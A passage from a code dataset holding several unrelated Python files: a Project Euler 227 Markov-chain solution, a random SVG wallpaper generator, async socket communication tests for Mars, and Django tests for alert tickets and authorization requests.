]\n","sub_path":"src/nalkinscloud_mosquitto/fixtures/tmp_0002_data_initial.py","file_name":"tmp_0002_data_initial.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"137451620","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n\nPE_0227\n\nThe Chase\n\nMarkov Chains...\n\nCreated on Mon Dec 11 18:52:38 2017\n@author: mbh\n\"\"\"\nimport time\nimport numpy as np\n\ndef p227(players):\n \n t0=time.clock()\n \n #if there are 2N players, distances between the dice-holding players will \n #vary from 0 to N.\n # We need a N+1 x N+1 transition matrix \n n=(players+2)//2 \n P=tpm(n)\n N=fundamental(P,[len(P)-1])\n t=absorbSteps(N)\n \n #We start in state s_0 (maximum distance apart) \n print(round(t[0][0],6))\n print(time.clock()-t0)\n\n#create transition matrix\ndef tpm(n):\n \n P=np.zeros([n,n])\n P[n-1][n-1]=36\n \n P[0][0]=18\n P[0][1]=16\n P[0][2]=2\n \n P[1][0]=8\n P[1][1]=19\n P[1][2]=8\n P[1][3]=1\n \n P[n-2][n-4]=1\n P[n-2][n-3]=8\n P[n-2][n-2]=19\n P[n-2][n-1]=8\n \n for i in range(2,n-2):\n P[i][i-2]=1\n P[i][i-1]=8\n P[i][i]=18\n P[i][i+1]=8\n P[i][i+2]=1\n \n #normalise P\n P/=36\n return P\n\n#The ij-entry nij of the fundamental matrix N is the expected number of times \n#the chain is in state sj, given that it starts in state si. The initial state\n# is counted if i = j \ndef fundamental(P,absorbingStates): \n \n Q=QfromP(P,absorbingStates) \n N=np.linalg.inv(np.identity(len(Q))-Q) \n return N\n\n#absorbing states is a list of absorbing states\ndef QfromP(P,absorbingStates):\n \n rows,cols=0,1\n Q=np.delete (P,absorbingStates,rows)\n Q=np.delete (Q,absorbingStates,cols) \n return Q\n\n#steps to absorbtion\ndef absorbSteps(N):\n\n #c is a column vector all of whose entries are 1\n c=np.ones([len(N),1])\n \n #Let ti be the expected number of steps before the chain is absorbed, given \n #that the chain starts in state s_i, and let t be the column vector whose \n #ith entry is t_i. Then\n t=np.dot(N,c) \n return t\n \n \n \n ","sub_path":"PE_0227/PE_0227.py","file_name":"PE_0227.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"591940254","text":"'''Archie'''\r\n\r\n# Imports\r\nimport math\r\nimport svgwrite\r\nimport random\r\n# Basics\r\ndwg = svgwrite.Drawing(filename='Archie.svg')\r\nrng = random.Random()\r\n# Parameters\r\nmin_size = 500\r\nmax_size = 5000\r\nmax_shapes = 1000\r\n\r\n\r\n# Styles\r\nclass Style:\r\n\r\n def __init__(self, name, list):\r\n self.name = name\r\n self.list = list\r\n self.rating = 25\r\n self.lowerbound = 0\r\n self.upperbound = self.lowerbound + self.rating\r\n\r\n\r\n# Tools\r\nall_shapes = Style('all shapes', ['circle', 'rectangle', 'square', 'line'])\r\nonly_circles = Style('only circles', ['circle'])\r\nonly_rects = Style('only rectangles', ['rectangle'])\r\nonly_squares = Style('only squares', ['square'])\r\nonly_lines = Style('only lines', ['line'])\r\ntool_list = [all_shapes, only_circles, only_rects, only_squares, only_lines]\r\n\r\n# Palettes\r\nrandom_colours = Style('Random Colours', 0)\r\nbasic_colours = Style('Basic Colours', ['blue', 'red', 'green', 'yellow', 'pink', 'orange', 'purple', 'white', 'black', 'grey'])\r\nblack_and_white = Style('B&W', ['#000', '#FFF'])\r\nmonochrome = Style('Monochrome', ['#000', '#111', '#222', '#333', '#444', '#555', '#666', '#777', '#888', '#999', '#aaa', '#bbb', '#ccc', '#ddd', '#eee', '#fff'])\r\np_reds = Style('Pastel Reds', ['#ff4848', '#ff7575', '#ff8a8a', '#ff9797', '#ffa8a8', '#ffbbbb', '#ffcece', '#ffdfdf', '#ffecec', '#fff2f2'])\r\np_pinks = Style('Pastel Pinks', ['#ff62b0', '#ff73b9', '#ff86c2', '#ff97cb', '#ffa8d3', '#ffbbdd', '#ffc8e3', '#ffdfef', '#ffecf5', '#fff9fc'])\r\np_blues = Style('Pastel Blues', ['#2897b7', '#2faace', '#44bdd5', '#57bcd9', '#7bcae1', '#8cd1e6', '#a5dbeb', '#b8e2ef', '#c9eaf3', '#eaf7fb'])\r\np_greens = Style('Pastel Greens', ['#4eb553', '#5cc25f', '#6ad06b', '#77dd77', '#84ea83', '#92f890', '#9fff9c'])\r\npalette_list = [random_colours, basic_colours, black_and_white, monochrome, p_reds, p_pinks, p_blues, p_greens]\r\n\r\n# Aspect Ratio\r\nrandom_aspect = Style('Random Aspect Ratio', 'rando')\r\none_by_one = Style('1x1', 1/1)\r\nfour_by_three = Style('4x3', 3/4)\r\nthree_by_four = Style('3x4', 4/3)\r\nsixteen_by_nine = Style('16x9', 9/16)\r\nnine_by_sixteen = Style('9x16', 16/9)\r\ngolden_portrait = Style('Golden Portrait', 1.609)\r\ngolden_landscape = Style('Golden Landscape', 1/1.609)\r\naspect_list = [random_aspect, one_by_one, four_by_three, three_by_four, sixteen_by_nine, nine_by_sixteen]\r\n\r\n# Size Style\r\nrandom_size = Style('Random Object Size', ['', ''])\r\nsmall = Style('Small', ['', 0.3])\r\nsmall_mid = Style('Small - Medium',['', 0.6])\r\nmid = Style('Medium', [0.4, 0.6])\r\nmid_large = Style('Medium - Large', [0.4, ''])\r\nlarge = Style('Large', [0.7, ''])\r\nsize_list = [random_size, small, small_mid, mid, large]\r\n\r\n# Padding Style\r\nno_padding = Style('No Padding', 0)\r\ntwopp = Style('2%', 0.02)\r\nfivepp = Style('5%', 0.05)\r\ntenpp = Style('10%', 0.1)\r\ntwentypp = Style('20%', 0.2)\r\nfortypp = Style('40%', 0.4)\r\nfiftyypp = Style('50%', 0.499) # 0.5 results in error - Needs to be one pixel difference\r\npadding_list = [no_padding, twopp, fivepp, tenpp, twentypp, fortypp, fiftyypp]\r\n\r\n# Number Styles\r\nmax_object_number = 500\r\nrandom_shape_number = Style('A Random Number of Shapes', [0, rng.randrange(1, max_object_number)])\r\nsuper_minimilist = Style('Super Minimal', [0,5])\r\nminimal = Style('Minimal', [0, 10])\r\nmodest = Style('Modest', [10, 30])\r\narchie1 = Style('Archie V1', [30, 80])\r\ncluttered = Style('Cluttered', [80, 200])\r\nhectic = Style('Hectic', [200, max_object_number])\r\nnumber_list = [random_shape_number, super_minimilist, minimal, modest, archie1, cluttered, hectic]\r\n\r\n\r\n\r\ndef Archie():\r\n # Style Functions\r\n def rater(list):\r\n sum_rating = 0\r\n for i in range(len(list)):\r\n list[i].lowerbound = sum_rating\r\n sum_rating = sum_rating + list[i].rating\r\n list[i].upperbound = sum_rating\r\n # print(list[i].name + ': ' + str(list[i].lowerbound) + ' < x < ' + str(list[i].upperbound))\r\n return sum_rating\r\n\r\n def style_picker(list):\r\n max_no = rater(list)\r\n picker = rng.randrange(0, max_no)\r\n # print(picker)\r\n for i in range(len(list)):\r\n if list[i].upperbound >= picker:\r\n # print(list[i].name)\r\n return list[i]\r\n\r\n # Style Picker\r\n tool = style_picker(tool_list)\r\n palette = random_colours # style_picker(palette_list)\r\n aspect = sixteen_by_nine\r\n size = style_picker(size_list)\r\n padding = style_picker(padding_list)\r\n clip = 0\r\n number = style_picker(number_list)\r\n print(tool.name)\r\n print(palette.name)\r\n print(aspect.name)\r\n print(size.name)\r\n print(padding.name)\r\n print(clip)\r\n print(number.name)\r\n\r\n # Shape Base Functions\r\n def height_assigner(aspect_ratio, w, min, max):\r\n if isinstance(aspect_ratio, float):\r\n height = int(w * aspect_ratio)\r\n return height\r\n else:\r\n height = rng.randrange(min, max)\r\n return height\r\n\r\n def sizer():\r\n maximum = min(width, height)\r\n if isinstance(size.list[0], float):\r\n l = int(size.list[0]*maximum)\r\n else:\r\n l = 50\r\n if isinstance(size.list[1], float):\r\n u = int(size.list[1]*maximum)\r\n else:\r\n u = int(0.9*maximum)\r\n # print(size.name + ' sized objects with max ' + str(maximum) + ' gives upper and lower bounds ' + str(l) + ', ' + str(u))\r\n s = rng.randrange(l, u)\r\n # print('Size = ' + str(s))\r\n return s\r\n\r\n def centre_picker(side):\r\n centre = rng.randrange(int(padding.list*side), int((1-padding.list)*side))\r\n # print(padding.name)\r\n # print(centre)\r\n return centre\r\n\r\n def colour_picker():\r\n if type(palette.list) == list:\r\n hexi_code = palette.list[rng.randrange(0, len(palette.list))]\r\n return hexi_code\r\n else:\r\n hexi = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f']\r\n hexi_code = ''\r\n for _ in range(6):\r\n hexi_code += hexi[rng.randrange(0, 15)]\r\n return '#' + hexi_code\r\n\r\n # Shape Creators\r\n def rand_circle():\r\n circle = dwg.circle(center=(centre_picker(width), centre_picker(height)), r=sizer()/4, fill=colour_picker())\r\n return circle\r\n\r\n def rand_rect(x=''):\r\n length = sizer()\r\n if type(x) == float:\r\n h = height_assigner(x, length, '', '')\r\n else:\r\n h = sizer()\r\n rect = dwg.rect(insert=(centre_picker(width), centre_picker(height)), size=(length, h), fill=colour_picker())\r\n return rect\r\n\r\n def rand_line():\r\n pts = [(centre_picker(width), centre_picker(height)), (centre_picker(width), centre_picker(height))]\r\n line = dwg.polyline(points=pts, stroke=colour_picker(), stroke_width=10, fill='none')\r\n return line\r\n\r\n def shape_picker():\r\n shp = tool.list[rng.randrange(0, len(tool.list))]\r\n if shp == 'circle':\r\n shape = rand_circle()\r\n elif shp == 'rectangle':\r\n shape = rand_rect()\r\n elif shp == 'square':\r\n shape = rand_rect(1.0)\r\n elif shp == 'line':\r\n shape = rand_line()\r\n else:\r\n print(\"I don't recognise\" + shp)\r\n return shape\r\n\r\n # Canvas Creator\r\n width = rng.randrange(min_size, max_size)\r\n height = height_assigner(aspect.list, width, min_size, max_size)\r\n # print(str(width) + ' x ' + str(height) + ' in a ' + aspect.name + ' aspect ratio')\r\n dwg.viewbox(width=width, height=height)\r\n background = dwg.rect(insert=(0, 0), size=(width, height), fill=colour_picker())\r\n dwg.add(background)\r\n\r\n # pad = dwg.rect(insert=(padding.list*width, padding.list*height), size=((1-(2*padding.list))*width, (1-(2*padding.list))*height))\r\n # dwg.add(pad)\r\n\r\n def placer():\r\n if isinstance(clip, str):\r\n print(clip)\r\n else:\r\n dwg.add(shape_picker())\r\n\r\n placer()\r\n for i in range(rng.randrange(number.list[0], number.list[1])):\r\n placer()\r\n\r\n\r\n dwg.save()\r\n\r\n\r\nArchie()\r\n","sub_path":"Archie V2 - Wallpaper.py","file_name":"Archie V2 - Wallpaper.py","file_ext":"py","file_size_in_byte":8124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"500117789","text":"# Copyright 1999-2020 Alibaba Group Holding Ltd.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport asyncio\nimport sys\nimport multiprocessing\nfrom typing import Union\n\nimport numpy as np\nimport pytest\n\nfrom mars.lib.aio import AioEvent\nfrom mars.oscar.backends.mars.communication import \\\n SocketChannel, SocketServer, UnixSocketServer, \\\n DummyChannel, DummyServer, get_client_type, \\\n SocketClient, UnixSocketClient, DummyClient\nfrom mars.utils import get_next_port\n\n\ntest_data = np.random.RandomState(0).rand(10, 10)\nport = get_next_port()\n\n\n# server_type, config, con\nparams = [\n (SocketServer, dict(host='127.0.0.1', port=port), f'127.0.0.1:{port}'),\n]\nif sys.platform != 'win32':\n params.append((UnixSocketServer, dict(process_index='0'), f'unixsocket:///0'))\nlocal_params = params.copy()\nlocal_params.append((DummyServer, dict(), 'dummy://'))\n\n\n@pytest.mark.parametrize(\n 'server_type, config, con',\n local_params\n)\n@pytest.mark.asyncio\nasync def test_comm(server_type, config, con):\n async def check_data(chan: Union[SocketChannel, DummyChannel]):\n np.testing.assert_array_equal(test_data, await chan.recv())\n await chan.send('success')\n\n config = config.copy()\n config['handle_channel'] = check_data\n\n # create server\n server = await server_type.create(config)\n await server.start()\n assert isinstance(server.info, dict)\n\n # create client\n client = await server_type.client_type.connect(con)\n assert isinstance(client.info, dict)\n assert isinstance(client.channel.info, dict)\n await client.send(test_data)\n\n assert 'success' == await client.recv()\n\n await client.close()\n assert client.closed\n\n # create client2\n async with await server_type.client_type.connect(con) as client2:\n assert not client2.closed\n assert client2.closed\n\n await server.join(.001)\n await server.stop()\n\n assert server.stopped\n\n async with await server_type.create(config) as server2:\n assert not server2.stopped\n assert server2.stopped\n\n\ndef _wrap_test(server_started_event, conf, tp):\n async def _test():\n async def check_data(chan: SocketChannel):\n np.testing.assert_array_equal(test_data, await chan.recv())\n await chan.send('success')\n\n nonlocal conf\n conf = conf.copy()\n conf['handle_channel'] = check_data\n\n # create server\n server = await tp.create(conf)\n await server.start()\n server_started_event.set()\n await server.join()\n\n asyncio.run(_test())\n\n\n@pytest.mark.parametrize(\n 'server_type, config, con',\n params\n)\n@pytest.mark.asyncio\nasync def test_multiprocess_comm(server_type, config, con):\n server_started = multiprocessing.Event()\n\n p = multiprocessing.Process(target=_wrap_test,\n args=(server_started, config, server_type))\n p.daemon = True\n p.start()\n\n await AioEvent(server_started).wait()\n\n # create client\n client = await server_type.client_type.connect(con)\n await client.channel.send(test_data)\n\n assert 'success' == await client.recv()\n\n await client.close()\n assert client.closed\n\n\ndef test_get_client_type():\n assert issubclass(get_client_type('127.0.0.1'), SocketClient)\n assert issubclass(get_client_type('unixsocket:///1'), UnixSocketClient)\n assert issubclass(get_client_type('dummy://'), DummyClient)\n","sub_path":"mars/oscar/backends/mars/communication/tests/test_comm.py","file_name":"test_comm.py","file_ext":"py","file_size_in_byte":3906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"476413934","text":"import secrets\nfrom unittest.mock import patch\n\nfrom django.test import override_settings\n\nfrom alerts import engine\nfrom alerts.collector import target_controllers\nfrom alerts.models import Ticket, TicketLog, Broadcast, AuthorizationRequest\nfrom alerts.modules.rules import Rule\nfrom alerts.tests.base import with_test_modules\nfrom api.tests.base import BaseTestCase\nfrom api.v1.handlers.alert_utils import get_ticket_bucket\nfrom api.v1.serializers.user_serializers import serialize_author\nfrom documents.tests.utils import with_fake_docs\nfrom remotes.models import Remote\n\n\n@override_settings(STACK_IS_SML=False)\nclass TicketViewTestCase(BaseTestCase):\n\n def api_url(self, *suffixes):\n prefix = f\"/api/{self.api_version}/target/{self.target}/ticket\"\n url = \"/\".join([\n prefix,\n *suffixes\n ])\n return url + (\"\" if url.endswith(\"/\") else \"/\")\n\n @with_test_modules\n def setUp(self):\n self.tickets = []\n self.controllers = target_controllers(self.target_object)\n for index, (module, controller) in enumerate(self.controllers.items()):\n ticket = Ticket.objects.create(\n module=module,\n state=list(controller.states)[0],\n result_state={\"level\": index, \"short_message\": \"test\"},\n target=self.target_object,\n archived=index % 2 != 0,\n evaluable=index % 3 == 0,\n groups=\"/\" + \"/\".join(controller.visibility_groups) + \"/\",\n )\n TicketLog.objects.create(\n ticket=ticket,\n meta={\"description\": \"testestest 1\"},\n )\n TicketLog.objects.create(\n ticket=ticket,\n meta={\"description\": \"testestest 2\"},\n )\n Broadcast.objects.create(\n ticket=ticket,\n handlers=[],\n )\n self.tickets.append(ticket)\n module, controller = next(iter(self.controllers.items()))\n self.tickets.append(Ticket.objects.create(\n module=module,\n state=Ticket.TicketState.CLOSED,\n target=self.target_object,\n groups=\"/\" + \"/\".join(controller.visibility_groups) + \"/\",\n ))\n self.as_authority()\n\n @with_test_modules\n def test_list_tickets(self):\n with self.subTest(\"unfiltered\"):\n response = self.client_get(self.api_url())\n self.assertResponseOk(response)\n self.assertEqual(response.data[\"count\"], len(self.tickets))\n\n with self.subTest(\"open\"):\n response = self.client_get(self.api_url(), {\"open\": \"yEs\"})\n self.assertResponseOk(response)\n self.assertEqual(\n response.data[\"count\"],\n len([t for t in self.tickets if t.state != Ticket.TicketState.CLOSED])\n )\n\n with self.subTest(\"closed\"):\n response = self.client_get(self.api_url(), {\"open\": \"nO\"})\n self.assertResponseOk(response)\n self.assertEqual(\n response.data[\"count\"],\n len([t for t in self.tickets if t.state == Ticket.TicketState.CLOSED])\n )\n\n with self.subTest(\"archived\"):\n response = self.client_get(self.api_url(), {\"archived\": \"true\"})\n self.assertResponseOk(response)\n self.assertTrue(all(t[\"archived\"] for t in response.data[\"results\"]))\n\n with self.subTest(\"not evaluable\"):\n response = self.client_get(self.api_url(), {\"evaluable\": \"false\"})\n self.assertResponseOk(response)\n self.assertTrue(all(not t[\"evaluable\"] for t in response.data[\"results\"]))\n\n with self.subTest(\"by module\"):\n module = list(self.controllers)[0]\n response = self.client_get(self.api_url(), {\"module\": module})\n self.assertResponseOk(response)\n self.assertEqual(\n response.data[\"count\"],\n len([t for t in self.tickets if t.module == module])\n )\n\n with self.subTest(\"by level range\"):\n response = self.client_get(self.api_url(), {\"level_gt\": 2, \"level_lte\": 4})\n self.assertResponseOk(response)\n self.assertTrue(all(\n t[\"result_state\"][\"level\"] in (3, 4) for t in response.data[\"results\"]\n ))\n\n with self.subTest(\"by group\"):\n response = self.client_get(self.api_url(), {\"group\": \"loremipsum\"})\n self.assertResponseOk(response)\n self.assertEqual(\n response.data[\"count\"],\n len([\n t for t in self.tickets\n if \"loremipsum\" in t.base_controller.visibility_groups\n ])\n )\n\n @with_test_modules\n def test_read_ticket(self):\n response = self.client_get(self.api_url(self.tickets[0].pk))\n self.assertResponseOk(response)\n self.assertEqual(len(response.data[\"logs\"]), self.tickets[0].logs.count())\n self.assertEqual(len(response.data[\"broadcasts\"]), self.tickets[0].broadcasts.count())\n\n @with_test_modules\n def test_archive_ticket(self):\n with self.subTest(\"fail without description\"):\n response = self.client_post(self.api_url(self.tickets[0].pk, \"archive\"), data={\n \"archived\": True,\n })\n self.assertResponseStatus(400, response)\n\n with self.subTest(\"archive normally\"):\n response = self.client_post(self.api_url(self.tickets[0].pk, \"archive\"), data={\n \"archived\": True,\n \"description\": \"Because it bored me\",\n })\n self.assertResponseOk(response)\n self.assertEqual(response.data[\"archived\"], True)\n log = response.data[\"logs\"][0]\n self.assertEqual(log[\"meta\"][\"description\"], \"Because it bored me\")\n self.assertEqual(log[\"meta\"].get(\"previous_archived\"), False)\n self.assertEqual(log[\"meta\"].get(\"next_archived\"), True)\n self.assertEqual(log[\"author\"][\"username\"], self.authority_user[\"username\"])\n\n with self.subTest(\"archive a second time (noop)\"):\n response = self.client_post(self.api_url(self.tickets[0].pk, \"archive\"), data={\n \"archived\": True,\n \"description\": \"No reason\",\n })\n self.assertResponseOk(response)\n self.assertEqual(response.data[\"archived\"], True)\n log = response.data[\"logs\"][0]\n self.assertNotEqual(log[\"meta\"][\"description\"], \"No reason\")\n\n with self.subTest(\"unarchive normally\"):\n response = self.client_post(self.api_url(self.tickets[0].pk, \"archive\"), data={\n \"archived\": False,\n \"description\": \"Because I'm not bored anymore\",\n })\n self.assertResponseOk(response)\n self.assertEqual(response.data[\"archived\"], False)\n log = response.data[\"logs\"][0]\n self.assertEqual(log[\"meta\"][\"description\"], \"Because I'm not bored anymore\")\n self.assertEqual(log[\"meta\"].get(\"previous_archived\"), True)\n self.assertEqual(log[\"meta\"].get(\"next_archived\"), False)\n self.assertEqual(log[\"author\"][\"username\"], self.authority_user[\"username\"])\n\n @with_test_modules\n def test_list_broadcasts(self):\n response = self.client_get(self.api_url(self.tickets[0].pk, \"broadcast\"))\n self.assertResponseOk(response)\n self.assertEqual(response.data[\"count\"], self.tickets[0].broadcasts.count())\n\n @with_test_modules\n def test_read_broadcast(self):\n response = self.client_get(self.api_url(\n self.tickets[0].pk,\n \"broadcast\",\n self.tickets[0].broadcasts.first().pk\n ))\n self.assertResponseOk(response)\n self.assertEqual(response.data[\"id\"], self.tickets[0].broadcasts.first().pk)\n\n @with_test_modules\n def test_create_broadcast(self):\n response = self.client_post(\n self.api_url(self.tickets[0].pk, \"broadcast\"),\n {\"handlers\": [{\"name\": \"testestest\"}]},\n )\n self.assertResponseOk(response)\n self.assertEqual(\n response.data[\"id\"],\n Broadcast.objects.filter(ticket=self.tickets[0]).first().pk,\n )\n\n def setup_manual_action(self):\n module = '_.ipsum.dolor'\n # close any ticket open in setup\n Ticket.objects.filter(module=module).update(state=Ticket.TicketState.CLOSED)\n # create new ticket to test on\n ticket = Ticket.objects.create(\n module=module,\n state='A',\n target=self.target_object\n )\n\n # run engine to update conditions\n engine.run(self.target_object, [module])\n ticket.refresh_from_db()\n self.assertTrue(len(ticket.close_conditions) > 0)\n self.assertTrue(len(ticket.archive_conditions) > 0)\n self.assertIn('B', ticket.escalate_conditions)\n return ticket, module\n\n @with_test_modules\n def test_create_authorization_request(self):\n ticket, module = self.setup_manual_action()\n\n with self.subTest('close'):\n # required authorizations (from _.ipsum.dolor definition)\n required_authorizations = [\n 'ticket.A.close.authorization.miner-2',\n 'ticket.A.close.authorization.miner-3',\n 'ticket.A.close.authorization.authority-3',\n ]\n\n def execute_request():\n return self.client_post(\n self.api_url(ticket.pk, \"authorization\"),\n {\"action\": 'close'},\n )\n\n # Check whether there are no logs at the begining\n logs = TicketLog.objects.filter(ticket=ticket)\n self.assertEqual(len(logs), 0)\n\n # create first authorization\n response = execute_request()\n self.assertResponseOk(response)\n auth_request = AuthorizationRequest.objects.filter(ticket=ticket, id=response.data[\"id\"]).first()\n self.assertIsNotNone(auth_request)\n\n self.assertEqual(auth_request.authorization, required_authorizations[0])\n self.assertEqual(auth_request.status, AuthorizationRequest.Status.PENDING)\n self.assertDictEqual(auth_request.created_by, serialize_author(self.authority_user_object))\n self.assertIsNotNone(auth_request.created_at)\n self.assertIsNone(auth_request.resolved_by)\n self.assertIsNone(auth_request.resolved_at)\n self.assertIsNone(auth_request.comment)\n\n # Check there is a new log entry related to the created request\n logs = TicketLog.objects.filter(ticket=ticket)\n self.assertEqual(len(logs), 1)\n self.assertEqual(logs.first().meta['description'], Rule.ActionDescription.REQUEST)\n\n # try to create again\n response = execute_request()\n # can not create again because of pending request\n self.assertResponseStatus(400, response)\n\n # Check there is no new log entry after trying to create the request again\n logs = TicketLog.objects.filter(ticket=ticket)\n self.assertEqual(len(logs), 1)\n\n # deny first request\n auth_request.status = AuthorizationRequest.Status.DENIED\n auth_request.save()\n\n # create and approve all three authorizations\n for authorization in required_authorizations:\n response = execute_request()\n self.assertResponseOk(response)\n auth_request = AuthorizationRequest.objects.get(id=response.data[\"id\"])\n self.assertEqual(auth_request.authorization, authorization)\n\n # approve first request\n auth_request.status = AuthorizationRequest.Status.APPROVED\n auth_request.save()\n # run engine to update conditions\n engine.run(self.target_object, [module])\n\n # try to create a fourth request\n response = execute_request()\n # can not create because all possible request are already approved\n self.assertResponseStatus(400, response)\n\n with self.subTest('archive'):\n # create archive authorization\n response = self.client_post(\n self.api_url(ticket.pk, \"authorization\"),\n {\"action\": 'archive'},\n )\n self.assertResponseOk(response)\n auth_request = AuthorizationRequest.objects.filter(ticket=ticket, id=response.data[\"id\"]).first()\n self.assertIsNotNone(auth_request)\n\n # required authorizations (from _.ipsum.dolor definition)\n self.assertEqual(auth_request.authorization, 'ticket.A.archive.authorization.authority-3')\n\n with self.subTest('escalate'):\n # create escalate authorization\n response = self.client_post(\n self.api_url(ticket.pk, \"authorization\"),\n {\"action\": 'escalate', \"to_state\": 'B'},\n )\n self.assertResponseOk(response)\n auth_request = AuthorizationRequest.objects.filter(ticket=ticket, id=response.data[\"id\"]).first()\n self.assertIsNotNone(auth_request)\n\n # required authorizations (from _.ipsum.dolor definition)\n self.assertEqual(auth_request.authorization, 'ticket.A.escalate.B.authorization.miner-3')\n\n with self.subTest('invalid escalate state'):\n # to state None\n self.assertResponseStatus(400, self.client_post(\n self.api_url(ticket.pk, \"authorization\"),\n {\"action\": 'escalate'},\n ))\n\n # to state without conditions\n self.assertResponseStatus(400, self.client_post(\n self.api_url(ticket.pk, \"authorization\"),\n {\"action\": 'escalate', \"to_state\": 'C'},\n ))\n\n # to state invalid\n self.assertResponseStatus(400, self.client_post(\n self.api_url(ticket.pk, \"authorization\"),\n {\"action\": 'escalate', \"to_state\": 'a non existent level'},\n ))\n\n with self.subTest('action does not exists'):\n response = self.client_post(\n self.api_url(ticket.pk, \"authorization\"),\n {\"action\": \"invalid action\"},\n )\n self.assertResponseStatus(400, response)\n\n with self.subTest('saving generic state letter'):\n module = '_.ipsum.amet'\n # create new ticket to test on\n ticket = Ticket.objects.create(\n module=module,\n state='A1',\n target=self.target_object\n )\n # run engine to update conditions\n engine.run(self.target_object, [module])\n ticket.refresh_from_db()\n\n # create escalate authorization\n response = self.client_post(\n self.api_url(ticket.pk, \"authorization\"),\n {\"action\": 'escalate', \"to_state\": 'B'},\n )\n self.assertResponseOk(response)\n auth_request = AuthorizationRequest.objects.filter(ticket=ticket, id=response.data[\"id\"]).first()\n self.assertIsNotNone(auth_request)\n # Authorization string must have a generic state A, instead of A1\n self.assertEqual(auth_request.authorization, 'ticket.A.escalate.B.authorization.miner-3')\n\n # Update ticket state to B1-1\n Ticket.objects.filter(module=module).update(state='B1-1')\n # run engine to update conditions\n engine.run(self.target_object, [module])\n ticket.refresh_from_db()\n # create another escalate authorization\n response = self.client_post(\n self.api_url(ticket.pk, \"authorization\"),\n {\"action\": 'escalate', \"to_state\": 'C'},\n )\n self.assertResponseOk(response)\n auth_request = AuthorizationRequest.objects.filter(ticket=ticket, id=response.data[\"id\"]).first()\n self.assertIsNotNone(auth_request)\n # Authorization string must have a generic state B, instead of B1-1\n self.assertEqual(auth_request.authorization, 'ticket.B.escalate.C.authorization.miner-3')\n\n @with_test_modules\n @override_settings(STACK_IS_SML=True, SMC_BROKER_URL='smc-broker')\n @patch('remotes.dispatch.send_messages')\n def test_create_authorization_request_sml_sends_message(self, send_messages):\n ticket, module = self.setup_manual_action()\n\n # only authority authorizations required messages between sml-smc\n close_authorizations = [\n ('ticket.A.close.authorization.miner-2', False),\n ('ticket.A.close.authorization.miner-3', False),\n ('ticket.A.close.authorization.authority-3', True),\n ]\n\n # create and approve all three authorizations\n for authorization, should_send_message in close_authorizations:\n send_messages.reset_mock()\n response = self.client_post(\n self.api_url(ticket.pk, \"authorization\"),\n {\"action\": 'close'},\n )\n self.assertResponseOk(response)\n auth_request = AuthorizationRequest.objects.get(id=response.data[\"id\"])\n self.assertEqual(auth_request.authorization, authorization)\n\n if should_send_message:\n # assert send_messages was called with execute intent command\n send_messages.assert_called_once()\n (messages, broker_url, broker_connection_ssl), _ = send_messages.call_args\n self.assertEqual(len(messages), 1)\n self.assertEqual(broker_url, 'smc-broker')\n self.assertEqual(messages[0].command, 'alerts.ticket.authorization.create')\n self.assertEqual(messages[0].body['id'], auth_request.id)\n else:\n send_messages.assert_not_called()\n\n # approve request\n auth_request.status = AuthorizationRequest.Status.APPROVED\n auth_request.save()\n # run engine to update conditions\n engine.run(self.target_object, [module])\n\n def assertUpdateRequest(self, ticket, url, comment, result_status, origin, docs):\n auth_request = AuthorizationRequest.objects.create(\n id=f'random_id-{secrets.token_urlsafe(8)}',\n ticket=ticket,\n authorization='ticket.A.close.authorization.authority-3',\n origin=origin\n )\n response = self.client.post(\n self.api_url(ticket.pk, \"authorization\", auth_request.pk, url),\n {\n \"comment\": comment,\n **{doc.name: doc.file for doc in docs}\n }\n )\n self.assertResponseOk(response)\n auth_request.refresh_from_db()\n self.assertEqual(auth_request.status, result_status)\n self.assertEqual(auth_request.comment, comment)\n self.assertEqual(auth_request.resolved_by, serialize_author(self.authority_user_object))\n ticket.refresh_from_db()\n return auth_request\n\n @patch('remotes.dispatch.send_messages')\n def assertUpdateRequestFromSMC(self, ticket, url, comment, docs, result_status, send_messages):\n target = ticket.target\n target.remote = Remote.objects.create(namespace='sml_namespace', exchange='sml_exchange', bucket='sml_bucket')\n target.save()\n\n auth_request = self.assertUpdateRequest(ticket, url, comment, result_status, 'sml_namespace', docs)\n\n send_messages.assert_called_once()\n (messages, broker_url, broker_connection_ssl), _ = send_messages.call_args\n self.assertEqual(len(messages), 1)\n self.assertEqual(messages[0].command, 'alerts.ticket.authorization.update')\n self.assertEqual(messages[0].body['id'], auth_request.id)\n self.assertEqual(messages[0].body['status'], auth_request.status)\n self.assertEqual(messages[0].body['comment'], auth_request.comment)\n self.assertDictEqual(messages[0].body['resolved_by'], auth_request.resolved_by)\n self.assertEqual(messages[0].exchange, target.remote.exchange)\n self.assertEqual(broker_url, 'smc_broker')\n\n @with_test_modules\n @override_settings(STACK_IS_SML=True)\n @with_fake_docs(count=3)\n def test_approve_authorization_request(self, docs):\n ticket, _ = self.setup_manual_action()\n self.assertFalse(ticket.close_conditions[2]['complete'])\n self.assertUpdateRequest(ticket, \"approve\", \"a comment\", AuthorizationRequest.Status.APPROVED, 'origin', docs)\n self.assertTrue(ticket.close_conditions[2]['complete'])\n\n # Check there is a new log entry with the positive resolution\n logs = TicketLog.objects.filter(ticket=ticket)\n self.assertEqual(len(logs), 1)\n self.assertEqual(logs.first().meta['description'], Rule.ActionDescription.AUTHORIZATION)\n self.assertEqual(logs.first().meta['status'], AuthorizationRequest.Status.APPROVED)\n self.assertEqual(logs.first().meta['comment'], \"a comment\")\n self.assertEqual(logs.first().documents.count(), 3)\n\n @with_test_modules\n @override_settings(STACK_IS_SML=False, BROKER_URL='smc_broker', 